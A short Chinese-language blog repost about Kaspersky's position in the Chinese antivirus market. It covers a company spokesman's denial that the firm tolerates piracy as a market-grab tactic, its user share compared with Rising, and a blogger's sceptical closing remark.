  之前有分析人士认为,卡巴斯基之所以纵容盗版用户,是在沿用国际厂商在中国惯用的“先圈地、后收钱”伎俩,对此,张立申给予了坚决否认,在他看来,杀毒软件与操作系统类的产品是完全不同的产品,“杀毒软件讲究的是用户体验,一款好的产品是绝对不会免费的。”

  市场份额方面,张立申则透露道,目前卡巴斯基的用户数量已经排在首位,但其收入以及企业版、网络版的用户仍落后于瑞星公司。尽管该公司创始人尤金卡巴斯基一再强调,卡巴斯基要坐上中国杀毒市场的头把交椅。但按照目前的发展速度,该公司三年后才能如愿。
      0point评点:谁能保证卡巴真的能信守自己的诺言,如果它真的坐上了国内杀软第一把交椅,那时能否继续宽容这些盗版用户就不得而知了。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/253